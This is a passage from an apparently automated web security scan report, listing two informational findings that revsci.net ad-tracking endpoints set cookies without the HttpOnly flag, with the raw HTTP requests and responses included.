Set-Cookie: NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd9c&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Mon, 06-Jun-2011 14:01:00 GMT; Path=/
Set-Cookie: rtc_7_f3=MLvn9yUVZjpnpsoVwxtUaAgBXM1ocLKpZkLem1XJimjUNmWkLuW+Q3IYAcHCWGbufeXNaSBtbG5g5lLo7eYML1bRrFjZ8GZkY1DoUVQ3JAFkNwLoqysQx52jEC2lMqa7ifpThxs7FyNvveFNtEn7NSMcJ2SH/j03Jmzm6B9e1KoIieaD6fQiz+SI37JiXn8z7XtHZMFtt272+/QzRcdgnWOdJNCjqAIeNphuktNAVr/HDP/YSOQy3kkr4NUHjvkkUrhr7WbzSfqA1MvgxrBz9iRzXradVJPn0fdOzB0+msOFqupVxy37ALlnnzDoASz2U1OcgEgeG+WV8hzBhWSJXDBRzrKIOwxeaBOhkrCzhdMeGy4zG0FAj/O7/Tu0HXAgyamecYsUt5hoqKvSCuPG66sWNIjOQ09Az4HEmltEiHlQr42e0xSoaGP6pj6u/ug4j6qm9remPZasxkhCsw9rRJ9xzsLQ16/+c7iYQzwO2wI1sFxOFTgcF0rJsrH2RLNC8zcxLWr7KlfpB4ZLpKqqojzY0pJoe6N7Jt9YwmtLLrOAizP57gse9Rf8AI2yMPD3HMDiws58WpQgTmSfCd5s849ALAy0/kJyEC7kKGH5i0xoELx4cqoVQ8sGsuzfEJVNiA2FBxgVaPTkScHKYeuHIbKaLzFeQMqiZqzQCKL2DYQJxKRmfoP6lY/yoowlXy8dWrI2rGMXIzCo4oWBDSOxiHHqc1vo5g0W/Z9+g6YgWZoZ4G8ilolPjmfRgn7f2YPFdUVTixjywHsRBmqnWfr/PD9ehQ8B+t6OIuhGnnKgcA/iX6iaRaDg63Eq9HTcrRpXFVmwrz7VSWUX4sbZYJs7DNbc8J/t7+QY4D/RX/xrzQUR2W1Tn07RWTUTmlXISziIN5UNDQ9c03yJaRCnjVmHY9hAmW6dpVqXeUwbjGOVxwmecpOnbSpTq5xE0CRdxnHf4QStwrBwr/FKMd+a/dBlwEolGm1HvaEG0pICWzDZ2hVeeNJuEhwOZNshSeEUgaPJ879t2sA4qw5UV0j+Uc/IMRHzohx8g8WAIRJTsBuIxSKmpu+dZF8fZTeKv9bgD6eb+qxB4yKhRhen4I/qhGIj1Oci6tXfQjOUl3SzFg8Py4Oa/werp4xtvN1s84DdhcC0lR5fOCLS9b3G7+5aCcNnvrv/8NrCS/jTxyCHoj6vbo6mX1e4X/mjJw18iYOhaB802RsdGuNUg7D+231yHlu7JjTrvjF4++snwjnDi+CXlNxQOXbD7J5T/1z2qnvDRf7JDT4X8vtlPKY4/BdnbD+DpcAImn1g/AbomaIYfPJC6/0PndODqXMddNA6iDqg0WeIYc49DHKdW5OdtG/l11ugUI5rv3Ccbxdj9KbpB64syn6ZNpuyTMEqjmtmryNrax42/C1cTdhfnyeENrLnWHnGSGmfQNDGc4ND4vvSPvv+/1gkpHRWdiKz3v0CdKoxFR2a7pwgDt0NwqyKAwz1S9PYQv7+jHRkMmS09BnmnxT35jy6qxR+h04rxWldh5Nb9tSFd/y3nVbhUpxclD8C3Jf2jy14PUdYBrHSBwobp86iS7Sr0pfxpJ6yYBXqqFvEaacobjsgOaJG5ArH7VjPz+nb/eolY3GQXiZYXpl8rs35wPJx/m/RdY5HFaYpj97Mc+LacQ7fPn4nGXobGuPcdPKLmjpy9e3RaQwhbNH1rI5TWZ6jzhyfYG1T8PMbysEIpJnvca7MpjiwPpTLBaMGft0wmEw5hmow3P2ZAAzZmHGNZMBN; Domain=.revsci.net; Expires=Tue, 08-May-2012 14:01:00 GMT; Path=/
X-Proc-ms: 3
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:01:00 GMT
Content-Length: 671

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=[];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z]{3
...[SNIP]...
10.95. http://pix04.revsci.net/J06575/a4/0/0/pcx.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /J06575/a4/0/0/pcx.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /J06575/a4/0/0/pcx.js?csid=J06575 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUP15EOheQIMp6aIYFMFwqgWKICRGi4LkSGHuoVo77dVqa7OUgcXqUqruxUK6pw26DoqAlJFLZfT4Ux5SbqTCquHuUc/XRFeRyFWPT6EN6ib9rOgornIgakmFz75BmUiSaHo+JZst/oPR9Zq4Tt2uVGJOix55hSkJ3LJKPQI1gnqJcPO+B0wk0qpMSQXyFuCqQpK8r5tYBj/bmtqBKECRDiwMULcazzRzzBdevJ3YZlw1fzc91DujPMvIrU3lBGHD+Oj3GY34vTCgAsALTSPABX9K+qdf26V67jxb2rFhuao8e8wHgc9RUGL1UarXrcKQoVg0O/dT54uSAyDaigAqzmSFzhzgmZT9BJMxPzc4NCP+DgolO7MVTtmzKnuBLvpPBvKHLv25Ok9kGqHBB+5DATvbNCMmEyH/IFwSZOzLes1MyDqRGKgNkRhQbjaoTJLPdtrCZICmiIGgDOjcsfvI7HUAbHc5uDjeMNE0BTWYE73Cg/viOkfNPjdw0BwOKK7W5JcIsu2UEjjN2Zn/OkFtTDweZtF; rtc_dGQ8=MLvntzE1JhpnJ5HLrv64joSEnGpKJDT5hxKcHQSZ6JT8viKgWFC/KkqPtZ8Ankr/EnNoaE3mdCHtdlcixiAHZGc5ezrv5YBAdX/ffqRorXEpNdm/rNPw0/Ru+FNWlqRUvIr8NZmaxT1XfsCBFwC57YYoJ8dUD0ufXIbI1AwqHU25HskJyoFKznw/sQhMPIHBJ73VP+WsQCcosoyebxnNQyk5bw9Bsr4Ajd4MGQyGjCMZs9RGNNK3gZkDTzt4/z2P/Ssv9/K+M83DKiwjAWi8utGtTdqyGb4IzhNu3lsN08QDZagfgB4l585OsT74yWCR/KejYXQTd4DW18xFu0u1sQaoaWTBOY/Jxq6p5u3FJalMuYrYBWmo4ctB0D/HgTzFFyfS+BUCo8wmacnHn4O/MsiR2LqU0m03bN27yxGajd0JW3dCdPkdZinY1oMQBDI5k5dohjorfehJRmVPiseZIe1egdAPJ2sDRkJZHabCSecm5jjK+CYjNinTqMghBbn4sodp/UCGYsEy7xf7J4OYFvLqndKiTaZQoJcUKc5oyzoKOM7++hWWLcTkob9bgmW9ufD3VkBebI8gJJxHhcKHrWm/eJZhnAjZdYP8LmVqJGER/ulNivQAr1Z9gh1pS4MHtL1CBSQLuxshNTfgm9Qnh83PhCXe6Yvk2VmX7Au4CemkqCTRRfHacCGSXK27rvSN58qKJgVMxMrJq29BzeVX0qGqvzZWmcCYGuyXUAPPKpj0eqmYV3+M63GrKuWMAA8+PbgoD5b7UZmM09hAnd1w2MxukZA3cMw0224znNvYvw3C0g+hDTgcn2mNvmM3NKx69VBxkjkOZxx6XZSBxHuDhwFRo0mFMBl0fKMGrF9xGVp42oFAH1EEod/28MSymYNvCbsfK4npaI+P8SK2x4V96vPHuTLDy/Cx6vHAh+vGlGwUBCANBff9nrluERrS+3Fyfx+Ui+p8hfo8cX2P+ETONPEfu+uP1+RCcG/400DyLJkt2SPTwT9pApTDqP6SZyya0LZzhosQBzN0pTIbzDXEeGOqYZP9VfGtLlYN69+lf/n0KwunQtrPfAR1dQ8puRIko3TButILht14pfWmofo5W0T3geacseWomgQLjLT3uFWX/HXp+K3yYMD+s1qh/O5fZ21itvVvyjurOJNHwPCBFNddUGGdHNUGO1T1Kyo42ZT/kMjgqiVSPrh+V27aJE522u9E5Uuvj48++J9zk0HAF4MP8pbMoeaq1U3zJHDdejn5X/BXm+thzK+Rj0hfGndyks5pZb2IvqvIrRO+Jh9lMW0WRh3MqKF/QUxLA0DV9lTInWhVKKDHCLf9B+Vr8d64IvjJ1SaxZM731RZxyn8HrvU6mZZo5hMLOYr95YzEFr9ZgdqU00kw90WgDPabslCoBnR8vLiP2BaVC7rX6eFBOv1ASiKQM9hdr0/ut12g3n8MYbIDtI7ghXyI31mAtBtWKqCrPU/eor48rAdH+FDHc8bvtoW73rj1Tpdq4/+oeY7fdYQjg3DsXB1bJFC2aHnkmzrR3l28WWFHb9D/32f+BBQA; rsiPus_wuF1="MLsXrqMOJjhroJB0OsFGPziNFPNiun2gwhaoALt97xKhGoM8aleSaGIyXRDs4FkB8sFCZuw+T+165hyVBVJdSmUgvaZFUEgQ++TCUEHmPCzXDcHU3/q71ALbK2PSrJN+jB0Gcwa4UhPEVrUN6TcHwqPWgepSOQrGAM308YkJ9Kue16ot0nIp6qAd3oiL1vu8ImerbnCX9fr9JwgYkrBhGapemCFDjspZk1rtEaWVVb/SLwdVTkAbzsNzSnzwc5wGCa8jVcpLL1HEVmqAjL5TwOMK3qCqjZRxHhcVoCO32Vm2a4+oGoVsu6f5cdmr702F+fO8bJ0zUZTlrWdNQF76rVKVigm4I2aRP1upzq3Xa844B3rJfxR7kbIeqiNcOFqKbSbO0FyTBJmabs/5OGsVm8MzaWv8XDRsNoP6aqXleVpyBBYMCmndtzdvmN0PX2PGTSEgHhHEOXIef+hyFlWIYJXhKyB1GZ1nN2HxLnlweSc/bw47BG+TDLVioZi40WnLGVk5Z4CwWDF0HwdzaazFGEJnNpjYIdAXTH/lTD8va6y4gx9mPASTJgNc22xlesGWI7OxZl1lqQ7HaLFB1HNYBtc5bP7IeCvhsYBGZg7cviKgAqSA9rxV77UbSt7TCcEyrrWjO+3NEalTV9bExjEijsonVl1qiCkFcvi4aTfn0Xp29/bqHk9TGMy+VTExoryi89XrlvZChiv8aCqD5nn1swwyeI8WXt6PokJinNDm627rLE7xLD9GZAmT4EC6DnSNF66FJKT8gRriX0keP+ld6zjtUeyx5jDTsazJK/T22dm7i42KiJZZ+f3mfdl1R07uyRQ6zBPxN70+SfMEN0VDs+0K+P2dhEnHBFEMNjU7Q45KqoSl8BK7apDExjVxjQh+dsxHVzgaFZsZaqXyOVXEIOp8oSNlzyOlBEIL/wfuQMfqNOFtMORF41x2ag+MOqOOgTOdugSJ08l6FYGH5XPnZQcM6Qwefavxgc9IzEXOoF0bdiHi8Phz+D5O/sUnh+KES8fiVsIqDkgN/d4VXR+Bqtve+rF1K2Zq3A=="; rsi_us_1000000="pUMlIz9DOAYU1O2uA3Nf1wgg9Tpn7P+LBAm++DA1mQ19Ktk0xHsNbUdnssfo0Gg2GtNOjezP3rQsX+ieC4o2fHI9QkQeov8FSjRptD7ENVbUid4nnMJw2upjcbtYuTDvN446ehF3GgXLLZTbonI4jYrOBasvRFfMnkE53wY4Qa+hKdx6gukgA/85R9jXhtGV7/piYr5YQZgjMiKl8zWjUoD0F3UhqKyr9Id97BfRNHCeDUiGyQYV3IR679d+6Fpy0gp1Hq2XjxlJKDOqjAs1Uw1dudiAIQw7rizeuLD3XUC+e/mDTPH7BnVmGnFlHpoxfT7YsL0wt1TCMgGvoSIbnMIU57JYoUftomTxWnNTVj2NzOwDjpZIg48YPTnIgihnfbJxlqTqbhkTFxz+dV3nEMImFBKzd64qvE1zt38WPal3ooNbYqY4hIZWj8N4pKHLwHPyWzs/CsI6rWRhrWMPRaUafMfQn/v0U75IJgD8TGuloOwC16CAbvKgsBHdSES2thl/yLffPkkgsVchivYvx1DIgzI+Hp2cwp15/JafWYD1uqtnSaqyiY5cSyX1S9pZYVMWf8I99X0PmkHmiE+AmJ2pOIUjqqv8lHsXuUlO5LZo1crEog7F/asoNmA7+b1HAp4GyFPw8IccpCRD55tkYzvfpalmWhSIak/31maiBYBGTGdMPAhhPIWehJXnhsO0s79zhTvo+mhSTEb31vIjsG19H8uhSlb70Xz/RdUHnSSFQu2fn9OoA0ULdTsbgEYRNxte1+V4Vu5pclZS/SluGYRGqFciUTHH7jlTzS7r4Od1PDbqHOXOoGhgdQKRwlGytvhlJ3xpN38TeBBvuSli78zJal5w2RgiXvdzsle4GypMSBJTlBFpkLcvXbok3eHAtIL39rfw/UIu83ImxrDg6smRtaoCYqy6FrPvEOZvbHeZKJ1G6PoYEXV8RC7c5ut/7o1FJqaAV9fv+dLKW/LayYdfhFv6v33uPJSN5cTsetqde/n2tODUxKQxVKARJrsoIbuTvqK0rkezL0LMNB5mMi30PtNyanRSr/WUuwQZpJ60S6tI3fUgKWeajoXdlSIz4FFghQ9I+YJhmXQ9IxhQqDK+BwrtqJ+G/7aCwcyCBYmRkfHJc/Flc9ttNYB8QLSGHHxZcNV7DJc5sT00OUsUVmrKDXWc+nRcX1WiQ/VkP0PS/bC1/DbhNecPWVRE0AXkOh/IOoVf06+8SOgC8Ev3jO0RbucQa8aazOvezkk7zeyQCkyl2Mc4X9xCgxUsXK9DtZSCJK6m2R/mQCTbaItUg3/6EIcy8zL2Scsdi6aQPsU9UrkfVegfH0Uty3GkCV77GW5oseV6DHz9+RNhUmepmjvJu5cKj0grDAv9MP790ikGiL9Vbfl+2hPsPfIsGhjWXsvCaPLDLnnlLu7s6jCtbDAg+6/AWwustsHfWZNO9mP2B2hNB72eXivVKC3ScCpTMJq/yXGNl7gyrzILPyfzvctlhE7tAAL1KCRqQVBYdg=="; udm_0=MLv39SEpLipv597JcdnUygV6rsvwpilMo4IXeAwquaRyre3gpPYIVAodYIp/pLDnrZ6pzwptsA0XKpUy7HBRG1IKyMiEh4VBn8RQKgHt6xmexyTANa3oP9nI5ve4Zh+cFpisilatsARekr/e1VTo6CfrY9ZOrKU59rPLHnZc0mKVcQ44RykdTAno/P8W1VY/OF5riAyTBWbBY+xYNSljIWcWOOtopIN1ZjQYZDMkgv8oJAkIGrSPg7YITZqDkGM+V0BX4IQvQU/ry0FVeR/RwM2R8eN2xwK8bXMaT8dnyGWiIwmFneP0q3borhBG+xrCFLFiU6qVr79K4V6YQuPzNuqA4/90ta/9VnFUEqhNTnmt1DrgJQOF4r1UEghYGiGgL7M7jrwbHJw9+F3CxjGnvmdNCsiiHDRDAMc/vfIfy1xA8L7rohMERi0dIDuvhqOPWEsI6+gjuwkRt93TDz/gwRoH3pOiO65cSq0JPJXL/eJxXICyA8Awu1c665ElpIHf+S2JzUt2IfmG6UqU7nNeIE7CqJ8wxwMGrI48La943kqanih8S8EHg93VfGjHcj2k0UdI+MOO5SUZtq0HZasWtuROl2/v/L3k3VhfBWMD9MKywUA3DZbUUdwgNu+Bc1D5GVtD/DFSVzHQd+Kthaux21W1VpYQzrJIOJqcfN+uFcepRaoHI2S6F+4MuQoZFMlFeSdfgpOqfSyBUa/S4SRDd2WkicgTYEf8w14nUrumB9cXOOs8IXQ3zkExOY2ILoGKzpi3VyhWA/E7FCSpV8XPeJUC3cephnvWTBkMkrOSNt+1c2G2kN2jJJu+t0Axdqd+gORvzH+Vh/dfmgaAk/YEKClysvExNZvw7tZ83xSC4kxPGUztLFNur6xF7/1lfGbJhpEOwNHvrxxdmXquPa98rGNTJlGE2KuHf96OXfa2fRUSFFdVEch+rdebr5A6GR+T8gEKpv5c/Kj/cUWy28+9cyQtHhLIz7E3JHVNRa1Iit99TBeVrjSUCEBciFZMwaQsrMtGEShvcBgNIKjzOM2bjkPTGk7U3NF9wbb7lKjRgR1a3vT+ePnQqbS+geKekpy0pYHIXkAz8rK/hMKwUUVuz/Sh6MkM2MO3MrV3kkzTtTQNj9q5xFCbt/phR+QzLH9cUhyOm+dQbNmQgiBz650QmznHkzThdkQ9qDa45Zs0ktlIz+ebUsOdl2IUiON4g2mdMKt5PQc62vmcGDUwYCvjBlm1gYSd9xvPi0tU6D3XX+oxjCU/9wnHCjGC8Y9JmhiMEF8QUbZgTzlV7IJD76HT9mUVgokd9gxAOQ==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOheQIMpzaxu2F29/z4Oss1gPYbtKdFKliortn5vw/ZgkGNdTd0q7tfEV6W8KbgxSTtLgyIUReTfvF7ywFO3PlFnZnuAmtQtD+EMy9q9rOgoHmIAWmnFDjxFv0B++CCnphzufoPR9Zq4aMm7FGZcwXFxRUEu+i+KvSI1gnqJcPOjsSrYe+3esiiicrZLD92NHoFX5y4Imzr1vDFC7Yy0/MmI3gRgwg39moeiOOZUiS9NtUjMBoUsgpqkUr8rFPfrm8SpaIJTzT2f02aWo/GFqRdvrqbs7cRZ5JqE84MepJBXfkRD5/rCGR23XtLWuwS8kkH2hVcB4E0fniwmFyk3mbqXsnQbsWoMc3zoOC3ZA4awVLltq9ZAPRLwfcN0b+eq5UHYwtsZA9tjdvE0R7Ty7q4R4yk7Oixp0V38PVHh2Ez4WnCYmmvI0ZNM7cndia0RdjXQ9SGNdOlGv5VgaJc//A+bB7bleJc9aDc+3JweIGeTdlvf62JrOm/agKJukYxdA+JvZX4mxqgZL6C9rt5Eqwg9FxoY0uUYfnW; Domain=.revsci.net; Expires=Tue, 08-May-2012 13:59:43 GMT; Path=/
X-Proc-ms: 0
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:42 GMT
Content-Length: 729

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','D08734_72078'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.repl
...[SNIP]...
10.96. http://pix04.revsci.net/J06575/b3/0/3/1003161/306691632.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /J06575/b3/0/3/1003161/306691632.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /J06575/b3/0/3/1003161/306691632.gif?D=DM_LOC%3Dhttp%253A%252F%252Fwww.floridatoday.com%252Farticle%252F20110508%252FNEWS01%252F105080319%252FHighly-publicized-murder-Caylee-Anthony-rivets-enrages%253Fzipcode%253Dundefined%2526age%253Dnull%2526gender%253Dundefined%2526_rsiL%253D0%26DM_CAT%3Dnewspaper%2520%253E%2520news%26DM_EOM%3D1&C=J06575 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rtc_dGQ8=MLvntzE1JhpnJ5HLrv64joSEnGpKJDT5hxKcHQSZ6JT8viKgWFC/KkqPtZ8Ankr/EnNoaE3mdCHtdlcixiAHZGc5ezrv5YBAdX/ffqRorXEpNdm/rNPw0/Ru+FNWlqRUvIr8NZmaxT1XfsCBFwC57YYoJ8dUD0ufXIbI1AwqHU25HskJyoFKznw/sQhMPIHBJ73VP+WsQCcosoyebxnNQyk5bw9Bsr4Ajd4MGQyGjCMZs9RGNNK3gZkDTzt4/z2P/Ssv9/K+M83DKiwjAWi8utGtTdqyGb4IzhNu3lsN08QDZagfgB4l585OsT74yWCR/KejYXQTd4DW18xFu0u1sQaoaWTBOY/Jxq6p5u3FJalMuYrYBWmo4ctB0D/HgTzFFyfS+BUCo8wmacnHn4O/MsiR2LqU0m03bN27yxGajd0JW3dCdPkdZinY1oMQBDI5k5dohjorfehJRmVPiseZIe1egdAPJ2sDRkJZHabCSecm5jjK+CYjNinTqMghBbn4sodp/UCGYsEy7xf7J4OYFvLqndKiTaZQoJcUKc5oyzoKOM7++hWWLcTkob9bgmW9ufD3VkBebI8gJJxHhcKHrWm/eJZhnAjZdYP8LmVqJGER/ulNivQAr1Z9gh1pS4MHtL1CBSQLuxshNTfgm9Qnh83PhCXe6Yvk2VmX7Au4CemkqCTRRfHacCGSXK27rvSN58qKJgVMxMrJq29BzeVX0qGqvzZWmcCYGuyXUAPPKpj0eqmYV3+M63GrKuWMAA8+PbgoD5b7UZmM09hAnd1w2MxukZA3cMw0224znNvYvw3C0g+hDTgcn2mNvmM3NKx69VBxkjkOZxx6XZSBxHuDhwFRo0mFMBl0fKMGrF9xGVp42oFAH1EEod/28MSymYNvCbsfK4npaI+P8SK2x4V96vPHuTLDy/Cx6vHAh+vGlGwUBCANBff9nrluERrS+3Fyfx+Ui+p8hfo8cX2P+ETONPEfu+uP1+RCcG/400DyLJkt2SPTwT9pApTDqP6SZyya0LZzhosQBzN0pTIbzDXEeGOqYZP9VfGtLlYN69+lf/n0KwunQtrPfAR1dQ8puRIko3TButILht14pfWmofo5W0T3geacseWomgQLjLT3uFWX/HXp+K3yYMD+s1qh/O5fZ21itvVvyjurOJNHwPCBFNddUGGdHNUGO1T1Kyo42ZT/kMjgqiVSPrh+V27aJE522u9E5Uuvj48++J9zk0HAF4MP8pbMoeaq1U3zJHDdejn5X/BXm+thzK+Rj0hfGndyks5pZb2IvqvIrRO+Jh9lMW0WRh3MqKF/QUxLA0DV9lTInWhVKKDHCLf9B+Vr8d64IvjJ1SaxZM731RZxyn8HrvU6mZZo5hMLOYr95YzEFr9ZgdqU00kw90WgDPabslCoBnR8vLiP2BaVC7rX6eFBOv1ASiKQM9hdr0/ut12g3n8MYbIDtI7ghXyI31mAtBtWKqCrPU/eor48rAdH+FDHc8bvtoW73rj1Tpdq4/+oeY7fdYQjg3DsXB1bJFC2aHnkmzrR3l28WWFHb9D/32f+BBQA; udm_0=MLv39SEpLipv597JcdnUygV6rsvwpilMo4IXeAwquaRyre3gpPYIVAodYIp/pLDnrZ6pzwptsA0XKpUy7HBRG1IKyMiEh4VBn8RQKgHt6xmexyTANa3oP9nI5ve4Zh+cFpisilatsARekr/e1VTo6CfrY9ZOrKU59rPLHnZc0mKVcQ44RykdTAno/P8W1VY/OF5riAyTBWbBY+xYNSljIWcWOOtopIN1ZjQYZDMkgv8oJAkIGrSPg7YITZqDkGM+V0BX4IQvQU/ry0FVeR/RwM2R8eN2xwK8bXMaT8dnyGWiIwmFneP0q3borhBG+xrCFLFiU6qVr79K4V6YQuPzNuqA4/90ta/9VnFUEqhNTnmt1DrgJQOF4r1UEghYGiGgL7M7jrwbHJw9+F3CxjGnvmdNCsiiHDRDAMc/vfIfy1xA8L7rohMERi0dIDuvhqOPWEsI6+gjuwkRt93TDz/gwRoH3pOiO65cSq0JPJXL/eJxXICyA8Awu1c665ElpIHf+S2JzUt2IfmG6UqU7nNeIE7CqJ8wxwMGrI48La943kqanih8S8EHg93VfGjHcj2k0UdI+MOO5SUZtq0HZasWtuROl2/v/L3k3VhfBWMD9MKywUA3DZbUUdwgNu+Bc1D5GVtD/DFSVzHQd+Kthaux21W1VpYQzrJIOJqcfN+uFcepRaoHI2S6F+4MuQoZFMlFeSdfgpOqfSyBUa/S4SRDd2WkicgTYEf8w14nUrumB9cXOOs8IXQ3zkExOY2ILoGKzpi3VyhWA/E7FCSpV8XPeJUC3cephnvWTBkMkrOSNt+1c2G2kN2jJJu+t0Axdqd+gORvzH+Vh/dfmgaAk/YEKClysvExNZvw7tZ83xSC4kxPGUztLFNur6xF7/1lfGbJhpEOwNHvrxxdmXquPa98rGNTJlGE2KuHf96OXfa2fRUSFFdVEch+rdebr5A6GR+T8gEKpv5c/Kj/cUWy28+9cyQtHhLIz7E3JHVNRa1Iit99TBeVrjSUCEBciFZMwaQsrMtGEShvcBgNIKjzOM2bjkPTGk7U3NF9wbb7lKjRgR1a3vT+ePnQqbS+geKekpy0pYHIXkAz8rK/hMKwUUVuz/Sh6MkM2MO3MrV3kkzTtTQNj9q5xFCbt/phR+QzLH9cUhyOm+dQbNmQgiBz650QmznHkzThdkQ9qDa45Zs0ktlIz+ebUsOdl2IUiON4g2mdMKt5PQc62vmcGDUwYCvjBlm1gYSd9xvPi0tU6D3XX+oxjCU/9wnHCjGC8Y9JmhiMEF8QUbZgTzlV7IJD76HT9mUVgokd9gxAOQ==; 